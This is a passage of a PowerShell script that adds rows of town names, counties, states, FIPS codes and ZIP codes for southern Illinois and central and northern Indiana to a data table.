$Cities.Rows.Add("Springfield","Sangamon","Illinois","IL","17","62701") + $null = $Cities.Rows.Add("Grandview","Sangamon","Illinois","IL","17","62702") + $null = $Cities.Rows.Add("Southern view","Sangamon","Illinois","IL","17","62703") + $null = $Cities.Rows.Add("Jerome","Sangamon","Illinois","IL","17","62704") + $null = $Cities.Rows.Add("Andrew","Sangamon","Illinois","IL","17","62707") + $null = $Cities.Rows.Add("Zcta 627hh","Sangamon","Illinois","IL","17","627HH") + $null = $Cities.Rows.Add("Centralia","Marion","Illinois","IL","17","62801") + $null = $Cities.Rows.Add("Hoyleton","Washington","Illinois","IL","17","62803") + $null = $Cities.Rows.Add("Albion","Edwards","Illinois","IL","17","62806") + $null = $Cities.Rows.Add("Alma","Marion","Illinois","IL","17","62807") + $null = $Cities.Rows.Add("Ashley","Washington","Illinois","IL","17","62808") + $null = $Cities.Rows.Add("Barnhill","Wayne","Illinois","IL","17","62809") + $null = $Cities.Rows.Add("Belle rive","Jefferson","Illinois","IL","17","62810") + $null = $Cities.Rows.Add("Bellmont","Wabash","Illinois","IL","17","62811") + $null = $Cities.Rows.Add("Benton","Franklin","Illinois","IL","17","62812") + $null = $Cities.Rows.Add("Bluford","Jefferson","Illinois","IL","17","62814") + $null = $Cities.Rows.Add("Bone gap","Edwards","Illinois","IL","17","62815") + $null = $Cities.Rows.Add("Bonnie","Jefferson","Illinois","IL","17","62816") + $null = $Cities.Rows.Add("Broughton","Hamilton","Illinois","IL","17","62817") + $null = $Cities.Rows.Add("Browns","Edwards","Illinois","IL","17","62818") + $null = $Cities.Rows.Add("Buckner","Franklin","Illinois","IL","17","62819") + $null = $Cities.Rows.Add("Burnt prairie","White","Illinois","IL","17","62820") + $null = $Cities.Rows.Add("Carmi","White","Illinois","IL","17","62821") + $null = $Cities.Rows.Add("Christopher","Franklin","Illinois","IL","17","62822") + $null = $Cities.Rows.Add("Cisne","Wayne","Illinois","IL","17","62823") + $null = $Cities.Rows.Add("Clay city","Clay","Illinois","IL","17","62824") + $null = $Cities.Rows.Add("Coello","Franklin","Illinois","IL","17","62825") + $null = $Cities.Rows.Add("Crossville","White","Illinois","IL","17","62827") + $null = $Cities.Rows.Add("Dahlgren","Hamilton","Illinois","IL","17","62828") + $null = $Cities.Rows.Add("Dale","Hamilton","Illinois","IL","17","62829") + $null = $Cities.Rows.Add("Dix","Jefferson","Illinois","IL","17","62830") + $null = $Cities.Rows.Add("Du bois","Washington","Illinois","IL","17","62831") + $null = $Cities.Rows.Add("Du quoin","Perry","Illinois","IL","17","62832") + $null = $Cities.Rows.Add("Ellery","Wayne","Illinois","IL","17","62833") + $null = $Cities.Rows.Add("Enfield","White","Illinois","IL","17","62835") + $null = $Cities.Rows.Add("Ewing","Franklin","Illinois","IL","17","62836") + $null = $Cities.Rows.Add("Fairfield","Wayne","Illinois","IL","17","62837") + $null = $Cities.Rows.Add("Farina","Fayette","Illinois","IL","17","62838") + $null = $Cities.Rows.Add("Flora","Clay","Illinois","IL","17","62839") + $null = $Cities.Rows.Add("Geff","Wayne","Illinois","IL","17","62842") + $null = $Cities.Rows.Add("Golden gate","Wayne","Illinois","IL","17","62843") + $null = $Cities.Rows.Add("Grayville","White","Illinois","IL","17","62844") + $null = $Cities.Rows.Add("Ina","Jefferson","Illinois","IL","17","62846") + $null = $Cities.Rows.Add("Irvington","Washington","Illinois","IL","17","62848") + $null = $Cities.Rows.Add("Iuka","Marion","Illinois","IL","17","62849") + $null = $Cities.Rows.Add("Johnsonville","Wayne","Illinois","IL","17","62850") + $null = $Cities.Rows.Add("Keenes","Wayne","Illinois","IL","17","62851") + $null = $Cities.Rows.Add("Keensburg","Wabash","Illinois","IL","17","62852") + $null = $Cities.Rows.Add("Kell","Marion","Illinois","IL","17","62853") + $null = $Cities.Rows.Add("Kinmundy","Marion","Illinois","IL","17","62854") + $null = $Cities.Rows.Add("Loogootee","Fayette","Illinois","IL","17","62857") + $null = $Cities.Rows.Add("Bible grove","Clay","Illinois","IL","17","62858") + $null = $Cities.Rows.Add("Mc leansboro","Hamilton","Illinois","IL","17","62859") + $null = $Cities.Rows.Add("Macedonia","Franklin","Illinois","IL","17","62860") + $null = $Cities.Rows.Add("Maunie","White","Illinois","IL","17","62861") + $null = $Cities.Rows.Add("Mill shoals","White","Illinois","IL","17","62862") + $null = $Cities.Rows.Add("Mount carmel","Wabash","Illinois","IL","17","62863") + $null = $Cities.Rows.Add("Mount vernon","Jefferson","Illinois","IL","17","62864") + $null = $Cities.Rows.Add("Mulkeytown","Franklin","Illinois","IL","17","62865") + $null = $Cities.Rows.Add("New haven","Gallatin","Illinois","IL","17","62867") + $null = $Cities.Rows.Add("Noble","Richland","Illinois","IL","17","62868") + $null = $Cities.Rows.Add("Norris city","White","Illinois","IL","17","62869") + $null = $Cities.Rows.Add("Odin","Marion","Illinois","IL","17","62870") + $null = $Cities.Rows.Add("Omaha","Gallatin","Illinois","IL","17","62871") + $null = $Cities.Rows.Add("Opdyke","Jefferson","Illinois","IL","17","62872") + $null = $Cities.Rows.Add("Orient","Franklin","Illinois","IL","17","62874") + $null = $Cities.Rows.Add("Patoka","Marion","Illinois","IL","17","62875") + $null = $Cities.Rows.Add("Radom","Washington","Illinois","IL","17","62876") + $null = $Cities.Rows.Add("Richview","Washington","Illinois","IL","17","62877") + $null = $Cities.Rows.Add("Rinard","Wayne","Illinois","IL","17","62878") + $null = $Cities.Rows.Add("Sailor springs","Clay","Illinois","IL","17","62879") + $null = $Cities.Rows.Add("Saint peter","Fayette","Illinois","IL","17","62880") + $null = $Cities.Rows.Add("Salem","Marion","Illinois","IL","17","62881") + $null = $Cities.Rows.Add("Sandoval","Marion","Illinois","IL","17","62882") + $null = $Cities.Rows.Add("Scheller","Jefferson","Illinois","IL","17","62883") + $null = $Cities.Rows.Add("Sesser","Franklin","Illinois","IL","17","62884") + $null = $Cities.Rows.Add("Shobonier","Fayette","Illinois","IL","17","62885") + $null = $Cities.Rows.Add("Sims","Wayne","Illinois","IL","17","62886") + $null = $Cities.Rows.Add("Springerton","White","Illinois","IL","17","62887") + $null = $Cities.Rows.Add("Tamaroa","Perry","Illinois","IL","17","62888") + $null = $Cities.Rows.Add("Texico","Jefferson","Illinois","IL","17","62889") + $null = $Cities.Rows.Add("Thompsonville","Franklin","Illinois","IL","17","62890") + $null = $Cities.Rows.Add("Valier","Franklin","Illinois","IL","17","62891") + $null = $Cities.Rows.Add("Vernon","Marion","Illinois","IL","17","62892") + $null = $Cities.Rows.Add("Walnut hill","Marion","Illinois","IL","17","62893") + $null = $Cities.Rows.Add("Waltonville","Jefferson","Illinois","IL","17","62894") + $null = $Cities.Rows.Add("Wayne city","Wayne","Illinois","IL","17","62895") + $null = $Cities.Rows.Add("West frankfort","Franklin","Illinois","IL","17","62896") + $null = $Cities.Rows.Add("Whittington","Franklin","Illinois","IL","17","62897") + $null = $Cities.Rows.Add("Woodlawn","Jefferson","Illinois","IL","17","62898") + $null = $Cities.Rows.Add("Xenia","Clay","Illinois","IL","17","62899") + $null = $Cities.Rows.Add("Zcta 628hh","Fayette","Illinois","IL","17","628HH") + $null = $Cities.Rows.Add("Zcta 628xx","Wayne","Illinois","IL","17","628XX") + $null = $Cities.Rows.Add("Carbondale","Jackson","Illinois","IL","17","62901") + $null = $Cities.Rows.Add("Alto pass","Union","Illinois","IL","17","62905") + $null = $Cities.Rows.Add("Anna","Union","Illinois","IL","17","62906") + $null = $Cities.Rows.Add("Ava","Jackson","Illinois","IL","17","62907") + $null = $Cities.Rows.Add("Belknap","Johnson","Illinois","IL","17","62908") + $null = $Cities.Rows.Add("New liberty","Massac","Illinois","IL","17","62910") + $null = $Cities.Rows.Add("Buncombe","Johnson","Illinois","IL","17","62912") + $null = $Cities.Rows.Add("Cairo","Alexander","Illinois","IL","17","62914") + $null = $Cities.Rows.Add("Cambria","Williamson","Illinois","IL","17","62915") + $null = $Cities.Rows.Add("Campbell hill","Jackson","Illinois","IL","17","62916") + $null = $Cities.Rows.Add("Carrier mills","Saline","Illinois","IL","17","62917") + $null = $Cities.Rows.Add("Carterville","Williamson","Illinois","IL","17","62918") + $null = $Cities.Rows.Add("Cave in rock","Hardin","Illinois","IL","17","62919") + $null = $Cities.Rows.Add("Cobden","Union","Illinois","IL","17","62920") + $null = $Cities.Rows.Add("Colp","Williamson","Illinois","IL","17","62921") + $null = $Cities.Rows.Add("Creal springs","Williamson","Illinois","IL","17","62922") + $null = $Cities.Rows.Add("Cypress","Johnson","Illinois","IL","17","62923") + $null = $Cities.Rows.Add("De soto","Jackson","Illinois","IL","17","62924") + $null = $Cities.Rows.Add("Dongola","Union","Illinois","IL","17","62926") + $null = $Cities.Rows.Add("Dowell","Jackson","Illinois","IL","17","62927") + $null = $Cities.Rows.Add("Eddyville","Pope","Illinois","IL","17","62928") + $null = $Cities.Rows.Add("Eldorado","Saline","Illinois","IL","17","62930") + $null = $Cities.Rows.Add("Elizabethtown","Hardin","Illinois","IL","17","62931") + $null = $Cities.Rows.Add("Elkville","Jackson","Illinois","IL","17","62932") + $null = $Cities.Rows.Add("Energy","Williamson","Illinois","IL","17","62933") + $null = $Cities.Rows.Add("Equality","Gallatin","Illinois","IL","17","62934") + $null = $Cities.Rows.Add("Galatia","Saline","Illinois","IL","17","62935") + $null = $Cities.Rows.Add("Brownfield","Pope","Illinois","IL","17","62938") + $null = $Cities.Rows.Add("Goreville","Johnson","Illinois","IL","17","62939") + $null = $Cities.Rows.Add("Gorham","Jackson","Illinois","IL","17","62940") + $null = $Cities.Rows.Add("Grand chain","Pulaski","Illinois","IL","17","62941") + $null = $Cities.Rows.Add("Grand tower","Jackson","Illinois","IL","17","62942") + $null = $Cities.Rows.Add("Grantsburg","Johnson","Illinois","IL","17","62943") + $null = $Cities.Rows.Add("Harrisburg","Saline","Illinois","IL","17","62946") + $null = $Cities.Rows.Add("Herod","Hardin","Illinois","IL","17","62947") + $null = $Cities.Rows.Add("Herrin","Williamson","Illinois","IL","17","62948") + $null = $Cities.Rows.Add("Hurst","Williamson","Illinois","IL","17","62949") + $null = $Cities.Rows.Add("Jacob","Jackson","Illinois","IL","17","62950") + $null = $Cities.Rows.Add("Johnston city","Williamson","Illinois","IL","17","62951") + $null = $Cities.Rows.Add("Jonesboro","Union","Illinois","IL","17","62952") + $null = $Cities.Rows.Add("Joppa","Massac","Illinois","IL","17","62953") + $null = $Cities.Rows.Add("Junction","Gallatin","Illinois","IL","17","62954") + $null = $Cities.Rows.Add("Karnak","Pulaski","Illinois","IL","17","62956") + $null = $Cities.Rows.Add("Mc clure","Alexander","Illinois","IL","17","62957") + $null = $Cities.Rows.Add("Makanda","Jackson","Illinois","IL","17","62958") + $null = $Cities.Rows.Add("Marion","Williamson","Illinois","IL","17","62959") + $null = $Cities.Rows.Add("Metropolis","Massac","Illinois","IL","17","62960") + $null = $Cities.Rows.Add("Miller city","Alexander","Illinois","IL","17","62962") + $null = $Cities.Rows.Add("Mound city","Pulaski","Illinois","IL","17","62963") + $null = $Cities.Rows.Add("Mounds","Pulaski","Illinois","IL","17","62964") + $null = $Cities.Rows.Add("Murphysboro","Jackson","Illinois","IL","17","62966") + $null = $Cities.Rows.Add("New burnside","Johnson","Illinois","IL","17","62967") + $null = $Cities.Rows.Add("Olive branch","Alexander","Illinois","IL","17","62969") + $null = $Cities.Rows.Add("Olmsted","Pulaski","Illinois","IL","17","62970") + $null = $Cities.Rows.Add("Ozark","Johnson","Illinois","IL","17","62972") + $null = $Cities.Rows.Add("Pittsburg","Williamson","Illinois","IL","17","62974") + $null = $Cities.Rows.Add("Pomona","Jackson","Illinois","IL","17","62975") + $null = $Cities.Rows.Add("Pulaski","Pulaski","Illinois","IL","17","62976") + $null = $Cities.Rows.Add("Raleigh","Saline","Illinois","IL","17","62977") + $null = $Cities.Rows.Add("Ridgway","Gallatin","Illinois","IL","17","62979") + $null = $Cities.Rows.Add("Rosiclare","Hardin","Illinois","IL","17","62982") + $null = $Cities.Rows.Add("Royalton","Franklin","Illinois","IL","17","62983") + $null = $Cities.Rows.Add("Shawneetown","Gallatin","Illinois","IL","17","62984") + $null = $Cities.Rows.Add("Robbs","Pope","Illinois","IL","17","62985") + $null = $Cities.Rows.Add("Stonefort","Saline","Illinois","IL","17","62987") + $null = $Cities.Rows.Add("Tamms","Alexander","Illinois","IL","17","62988") + $null = $Cities.Rows.Add("Gale","Alexander","Illinois","IL","17","62990") + $null = $Cities.Rows.Add("Tunnel hill","Johnson","Illinois","IL","17","62991") + $null = $Cities.Rows.Add("Ullin","Pulaski","Illinois","IL","17","62992") + $null = $Cities.Rows.Add("Unity","Alexander","Illinois","IL","17","62993") + $null = $Cities.Rows.Add("Vergennes","Jackson","Illinois","IL","17","62994") + $null = $Cities.Rows.Add("Vienna","Johnson","Illinois","IL","17","62995") + $null = $Cities.Rows.Add("Villa ridge","Pulaski","Illinois","IL","17","62996") + $null = $Cities.Rows.Add("Willisville","Perry","Illinois","IL","17","62997") + $null = $Cities.Rows.Add("Wolf lake","Union","Illinois","IL","17","62998") + $null = $Cities.Rows.Add("Zeigler","Franklin","Illinois","IL","17","62999") + $null = $Cities.Rows.Add("Zcta 629hh","Alexander","Illinois","IL","17","629HH") + $null = $Cities.Rows.Add("Alexandria","Madison","Indiana","IN","18","46001") + $null = $Cities.Rows.Add("Anderson","Madison","Indiana","IN","18","46011") + $null = $Cities.Rows.Add("Anderson","Madison","Indiana","IN","18","46012") + $null = $Cities.Rows.Add("Anderson","Madison","Indiana","IN","18","46013") + $null = $Cities.Rows.Add("Anderson","Madison","Indiana","IN","18","46016") + $null = $Cities.Rows.Add("Chesterfield","Madison","Indiana","IN","18","46017") + $null = $Cities.Rows.Add("Arcadia","Hamilton","Indiana","IN","18","46030") + $null = $Cities.Rows.Add("Atlanta","Hamilton","Indiana","IN","18","46031") + $null = $Cities.Rows.Add("Carmel","Hamilton","Indiana","IN","18","46032") + $null = $Cities.Rows.Add("Carmel","Hamilton","Indiana","IN","18","46033") + $null = $Cities.Rows.Add("Cicero","Hamilton","Indiana","IN","18","46034") + $null = $Cities.Rows.Add("Colfax","Clinton","Indiana","IN","18","46035") + $null = $Cities.Rows.Add("Elwood","Madison","Indiana","IN","18","46036") + $null = $Cities.Rows.Add("Fishers","Hamilton","Indiana","IN","18","46038") + $null = $Cities.Rows.Add("Forest","Clinton","Indiana","IN","18","46039") + $null = $Cities.Rows.Add("Fortville","Hancock","Indiana","IN","18","46040") + $null = $Cities.Rows.Add("Hillisburg","Clinton","Indiana","IN","18","46041") + $null = $Cities.Rows.Add("Frankton","Madison","Indiana","IN","18","46044") + $null = $Cities.Rows.Add("Goldsmith","Tipton","Indiana","IN","18","46045") + $null = $Cities.Rows.Add("Hobbs","Tipton","Indiana","IN","18","46047") + $null = $Cities.Rows.Add("Ingalls","Madison","Indiana","IN","18","46048") + $null = $Cities.Rows.Add("Kempton","Tipton","Indiana","IN","18","46049") + $null = $Cities.Rows.Add("Kirklin","Clinton","Indiana","IN","18","46050") + $null = $Cities.Rows.Add("Lapel","Madison","Indiana","IN","18","46051") + $null = $Cities.Rows.Add("Lebanon","Boone","Indiana","IN","18","46052") + $null = $Cities.Rows.Add("Mc cordsville","Hancock","Indiana","IN","18","46055") + $null = $Cities.Rows.Add("Markleville","Madison","Indiana","IN","18","46056") + $null = $Cities.Rows.Add("Michigantown","Clinton","Indiana","IN","18","46057") + $null = $Cities.Rows.Add("Mulberry","Clinton","Indiana","IN","18","46058") + $null = $Cities.Rows.Add("Noblesville","Hamilton","Indiana","IN","18","46060") + $null = $Cities.Rows.Add("Orestes","Madison","Indiana","IN","18","46063") + $null = $Cities.Rows.Add("Pendleton","Madison","Indiana","IN","18","46064") + $null = $Cities.Rows.Add("Rossville","Clinton","Indiana","IN","18","46065") + $null = $Cities.Rows.Add("Sharpsville","Tipton","Indiana","IN","18","46068") + $null = $Cities.Rows.Add("Sheridan","Hamilton","Indiana","IN","18","46069") + $null = $Cities.Rows.Add("Summitville","Madison","Indiana","IN","18","46070") + $null = $Cities.Rows.Add("Thorntown","Boone","Indiana","IN","18","46071") + $null = $Cities.Rows.Add("Tipton","Tipton","Indiana","IN","18","46072") + $null = $Cities.Rows.Add("Westfield","Hamilton","Indiana","IN","18","46074") + $null = $Cities.Rows.Add("Whitestown","Boone","Indiana","IN","18","46075") + $null = $Cities.Rows.Add("Windfall","Tipton","Indiana","IN","18","46076") + $null = $Cities.Rows.Add("Zionsville","Boone","Indiana","IN","18","46077") + $null = $Cities.Rows.Add("Zcta 460hh","Hamilton","Indiana","IN","18","460HH") + $null = $Cities.Rows.Add("Advance","Boone","Indiana","IN","18","46102") + $null = $Cities.Rows.Add("Amo","Hendricks","Indiana","IN","18","46103") + $null = $Cities.Rows.Add("Arlington","Rush","Indiana","IN","18","46104") + $null = $Cities.Rows.Add("Bainbridge","Putnam","Indiana","IN","18","46105") + $null = $Cities.Rows.Add("Bargersville","Johnson","Indiana","IN","18","46106") + $null = $Cities.Rows.Add("Beech grove","Marion","Indiana","IN","18","46107") + $null = $Cities.Rows.Add("Boggstown","Shelby","Indiana","IN","18","46110") + $null = $Cities.Rows.Add("Brooklyn","Morgan","Indiana","IN","18","46111") + $null = $Cities.Rows.Add("Brownsburg","Hendricks","Indiana","IN","18","46112") + $null = $Cities.Rows.Add("Camby","Morgan","Indiana","IN","18","46113") + $null = $Cities.Rows.Add("Carthage","Rush","Indiana","IN","18","46115") + $null = $Cities.Rows.Add("Charlottesville","Hancock","Indiana","IN","18","46117") + $null = $Cities.Rows.Add("Clayton","Hendricks","Indiana","IN","18","46118") + $null = $Cities.Rows.Add("Cloverdale","Putnam","Indiana","IN","18","46120") + $null = $Cities.Rows.Add("Coatesville","Putnam","Indiana","IN","18","46121") + $null = $Cities.Rows.Add("Danville","Hendricks","Indiana","IN","18","46122") + $null = $Cities.Rows.Add("Zcta 46123","Hendricks","Indiana","IN","18","46123") + $null = $Cities.Rows.Add("Edinburgh","Johnson","Indiana","IN","18","46124") + $null = $Cities.Rows.Add("Eminence","Morgan","Indiana","IN","18","46125") + $null = $Cities.Rows.Add("Fairland","Shelby","Indiana","IN","18","46126") + $null = $Cities.Rows.Add("Falmouth","Rush","Indiana","IN","18","46127") + $null = $Cities.Rows.Add("Fillmore","Putnam","Indiana","IN","18","46128") + $null = $Cities.Rows.Add("Fountaintown","Shelby","Indiana","IN","18","46130") + $null = $Cities.Rows.Add("Franklin","Johnson","Indiana","IN","18","46131") + $null = $Cities.Rows.Add("Glenwood","Fayette","Indiana","IN","18","46133") + $null = $Cities.Rows.Add("Greencastle","Putnam","Indiana","IN","18","46135") + $null = $Cities.Rows.Add("Greenfield","Hancock","Indiana","IN","18","46140") + $null = $Cities.Rows.Add("Greenwood","Johnson","Indiana","IN","18","46142") + $null = $Cities.Rows.Add("Greenwood","Johnson","Indiana","IN","18","46143") + $null = $Cities.Rows.Add("Gwynneville","Shelby","Indiana","IN","18","46144") + $null = $Cities.Rows.Add("Jamestown","Boone","Indiana","IN","18","46147") + $null = $Cities.Rows.Add("Knightstown","Henry","Indiana","IN","18","46148") + $null = $Cities.Rows.Add("Lizton","Hendricks","Indiana","IN","18","46149") + $null = $Cities.Rows.Add("Manilla","Rush","Indiana","IN","18","46150") + $null = $Cities.Rows.Add("Centerton","Morgan","Indiana","IN","18","46151") + $null = $Cities.Rows.Add("Mays","Rush","Indiana","IN","18","46155") + $null = $Cities.Rows.Add("Milroy","Rush","Indiana","IN","18","46156") + $null = $Cities.Rows.Add("Monrovia","Morgan","Indiana","IN","18","46157") + $null = $Cities.Rows.Add("Mooresville","Morgan","Indiana","IN","18","46158") + $null = $Cities.Rows.Add("Morgantown","Brown","Indiana","IN","18","46160") + $null = $Cities.Rows.Add("Morristown","Shelby","Indiana","IN","18","46161") + $null = $Cities.Rows.Add("Needham","Shelby","Indiana","IN","18","46162") + $null = $Cities.Rows.Add("New palestine","Hancock","Indiana","IN","18","46163") + $null = $Cities.Rows.Add("Nineveh","Brown","Indiana","IN","18","46164") + $null = $Cities.Rows.Add("North salem","Hendricks","Indiana","IN","18","46165") + $null = $Cities.Rows.Add("Paragon","Morgan","Indiana","IN","18","46166") + $null = $Cities.Rows.Add("Pittsboro","Hendricks","Indiana","IN","18","46167") + $null = $Cities.Rows.Add("Avon","Hendricks","Indiana","IN","18","46168") + $null = $Cities.Rows.Add("Reelsville","Putnam","Indiana","IN","18","46171") + $null = $Cities.Rows.Add("Roachdale","Putnam","Indiana","IN","18","46172") + $null = $Cities.Rows.Add("Rushville","Rush","Indiana","IN","18","46173") + $null = $Cities.Rows.Add("Russellville","Putnam","Indiana","IN","18","46175") + $null = $Cities.Rows.Add("Shelbyville","Shelby","Indiana","IN","18","46176") + $null = $Cities.Rows.Add("Stilesville","Hendricks","Indiana","IN","18","46180") + $null = $Cities.Rows.Add("Trafalgar","Johnson","Indiana","IN","18","46181") + $null = $Cities.Rows.Add("Waldron","Shelby","Indiana","IN","18","46182") + $null = $Cities.Rows.Add("New whiteland","Johnson","Indiana","IN","18","46184") + $null = $Cities.Rows.Add("Wilkinson","Hancock","Indiana","IN","18","46186") + $null = $Cities.Rows.Add("Zcta 461hh","Morgan","Indiana","IN","18","461HH") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46201") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46202") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46203") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46204") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46205") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46208") + $null = $Cities.Rows.Add("Eagle creek","Marion","Indiana","IN","18","46214") + $null = $Cities.Rows.Add("Fort benjamin ha","Marion","Indiana","IN","18","46216") + $null = $Cities.Rows.Add("Southport","Marion","Indiana","IN","18","46217") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46218") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46219") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46220") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46221") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46222") + $null = $Cities.Rows.Add("Speedway","Marion","Indiana","IN","18","46224") + $null = $Cities.Rows.Add("Indianapolis","Marion","Indiana","IN","18","46225") + $null = $Cities.Rows.Add("Lawrence","Marion","Indiana","IN","18","46226") + $null = $Cities.Rows.Add("Southport","Marion","Indiana","IN","18","46227") + $null = $Cities.Rows.Add("Zcta 46228","Marion","Indiana","IN","18","46228") + $null = $Cities.Rows.Add("Cumberland","Marion","Indiana","IN","18","46229") + $null = $Cities.Rows.Add("Bridgeport","Marion","Indiana","IN","18","46231") + $null = $Cities.Rows.Add("Clermont","Marion","Indiana","IN","18","46234") + $null = $Cities.Rows.Add("Zcta 46235","Marion","Indiana","IN","18","46235") + $null = $Cities.Rows.Add("Oaklandon","Marion","Indiana","IN","18","46236") + $null = $Cities.Rows.Add("Southport","Marion","Indiana","IN","18","46237") + $null = $Cities.Rows.Add("Wanamaker","Marion","Indiana","IN","18","46239") + $null = $Cities.Rows.Add("Nora","Marion","Indiana","IN","18","46240") + $null = $Cities.Rows.Add("Park fletcher","Marion","Indiana","IN","18","46241") + $null = $Cities.Rows.Add("Castleton","Marion","Indiana","IN","18","46250") + $null = $Cities.Rows.Add("Eagle creek","Marion","Indiana","IN","18","46254") + $null = $Cities.Rows.Add("Castleton","Marion","Indiana","IN","18","46256") + $null = $Cities.Rows.Add("Acton","Marion","Indiana","IN","18","46259") + $null = $Cities.Rows.Add("Nora","Marion","Indiana","IN","18","46260") + $null = $Cities.Rows.Add("New augusta","Marion","Indiana","IN","18","46268") + $null = $Cities.Rows.Add("New augusta","Marion","Indiana","IN","18","46278") + $null = $Cities.Rows.Add("Nora","Hamilton","Indiana","IN","18","46280") + $null = $Cities.Rows.Add("Nora","Hamilton","Indiana","IN","18","46290") + $null = $Cities.Rows.Add("Zcta 462hh","Hamilton","Indiana","IN","18","462HH") + $null = $Cities.Rows.Add("Beverly shores","Porter","Indiana","IN","18","46301") + $null = $Cities.Rows.Add("East cedar lake","Lake","Indiana","IN","18","46303") + $null = $Cities.Rows.Add("Porter","Porter","Indiana","IN","18","46304") + $null = $Cities.Rows.Add("Crown point","Lake","Indiana","IN","18","46307") + $null = $Cities.Rows.Add("Demotte","Jasper","Indiana","IN","18","46310") + $null = $Cities.Rows.Add("Dyer","Lake","Indiana","IN","18","46311") + $null = $Cities.Rows.Add("East chicago","Lake","Indiana","IN","18","46312") + $null = $Cities.Rows.Add("Griffith","Lake","Indiana","IN","18","46319") + $null = $Cities.Rows.Add("Hammond","Lake","Indiana","IN","18","46320") + $null = $Cities.Rows.Add("Munster","Lake","Indiana","IN","18","46321") + $null = $Cities.Rows.Add("Highland","Lake","Indiana","IN","18","46322") + $null = $Cities.Rows.Add("Hammond","Lake","Indiana","IN","18","46323") + $null = $Cities.Rows.Add("Hammond","Lake","Indiana","IN","18","46324") + $null = $Cities.Rows.Add("Hammond","Lake","Indiana","IN","18","46327") + $null = $Cities.Rows.Add("Hanna","La Porte","Indiana","IN","18","46340") + $null = $Cities.Rows.Add("Hebron","Porter","Indiana","IN","18","46341") + $null = $Cities.Rows.Add("Hobart","Lake","Indiana","IN","18","46342") + $null = $Cities.Rows.Add("Kingsbury","La Porte","Indiana","IN","18","46345") + $null = $Cities.Rows.Add("Kingsford height","La Porte","Indiana","IN","18","46346") + $null = $Cities.Rows.Add("Kouts","Porter","Indiana","IN","18","46347") + $null = $Cities.Rows.Add("La crosse","La Porte","Indiana","IN","18","46348") + $null = $Cities.Rows.Add("Lake village","Newton","Indiana","IN","18","46349") + $null = $Cities.Rows.Add("La porte","La Porte","Indiana","IN","18","46350") + $null = $Cities.Rows.Add("Lowell","Lake","Indiana","IN","18","46356") + $null = $Cities.Rows.Add("Michigan city","La Porte","Indiana","IN","18","46360") + $null = $Cities.Rows.Add("Mill creek","La Porte","Indiana","IN","18","46365") + $null = $Cities.Rows.Add("North judson","Starke","Indiana","IN","18","46366") + $null = $Cities.Rows.Add("Portage","Porter","Indiana","IN","18","46368") + $null = $Cities.Rows.Add("Rolling prairie","La Porte","Indiana","IN","18","46371") + $null = $Cities.Rows.Add("Saint john","Lake","Indiana","IN","18","46373") + $null = $Cities.Rows.Add("San pierre","Starke","Indiana","IN","18","46374") + $null = $Cities.Rows.Add("Schererville","Lake","Indiana","IN","18","46375") + $null = $Cities.Rows.Add("Schneider","Lake","Indiana","IN","18","46376") + $null = $Cities.Rows.Add("Shelby","Lake","Indiana","IN","18","46377") + $null = $Cities.Rows.Add("Sumava resorts","Newton","Indiana","IN","18","46379") + $null = $Cities.Rows.Add("Thayer","Newton","Indiana","IN","18","46381") + $null = $Cities.Rows.Add("Union mills","La Porte","Indiana","IN","18","46382") + $null = $Cities.Rows.Add("Valparaiso","Porter","Indiana","IN","18","46383") + $null = $Cities.Rows.Add("Zcta 46385","Porter","Indiana","IN","18","46385") + $null = $Cities.Rows.Add("Wanatah","La Porte","Indiana","IN","18","46390") + $null = $Cities.Rows.Add("Westville","La Porte","Indiana","IN","18","46391") + $null = $Cities.Rows.Add("Wheatfield","Jasper","Indiana","IN","18","46392") + $null = $Cities.Rows.Add("Wheeler","Porter","Indiana","IN","18","46393") + $null = $Cities.Rows.Add("Whiting","Lake","Indiana","IN","18","46394") + $null = $Cities.Rows.Add("Zcta 463hh","Lake","Indiana","IN","18","463HH") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46402") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46403") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46404") + $null = $Cities.Rows.Add("Lake station","Lake","Indiana","IN","18","46405") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46406") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46407") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46408") + $null = $Cities.Rows.Add("Gary","Lake","Indiana","IN","18","46409") + $null = $Cities.Rows.Add("Merrillville","Lake","Indiana","IN","18","46410") + $null = $Cities.Rows.Add("Zcta 464hh","Lake","Indiana","IN","18","464HH") + $null = $Cities.Rows.Add("Argos","Marshall","Indiana","IN","18","46501") + $null = $Cities.Rows.Add("Atwood","Kosciusko","Indiana","IN","18","46502") + $null = $Cities.Rows.Add("Bourbon","Marshall","Indiana","IN","18","46504") + $null = $Cities.Rows.Add("Bremen","Marshall","Indiana","IN","18","46506") + $null = $Cities.Rows.Add("Bristol","Elkhart","Indiana","IN","18","46507") + $null = $Cities.Rows.Add("Burket","Kosciusko","Indiana","IN","18","46508") + $null = $Cities.Rows.Add("Claypool","Kosciusko","Indiana","IN","18","46510") + $null = $Cities.Rows.Add("Culver military","Marshall","Indiana","IN","18","46511") + $null = $Cities.Rows.Add("Donaldson","Marshall","Indiana","IN","18","46513") + $null = $Cities.Rows.Add("Elkhart","Elkhart","Indiana","IN","18","46514") + $null = $Cities.Rows.Add("Elkhart","Elkhart","Indiana","IN","18","46516") + $null = $Cities.Rows.Add("Elkhart","Elkhart","Indiana","IN","18","46517") + $null = $Cities.Rows.Add("Etna green","Kosciusko","Indiana","IN","18","46524") + $null = $Cities.Rows.Add("Foraker","Elkhart","Indiana","IN","18","46526") + $null = $Cities.Rows.Add("Zcta 46528","Elkhart","Indiana","IN","18","46528") + $null = $Cities.Rows.Add("Granger","St. Joseph","Indiana","IN","18","46530") + $null = 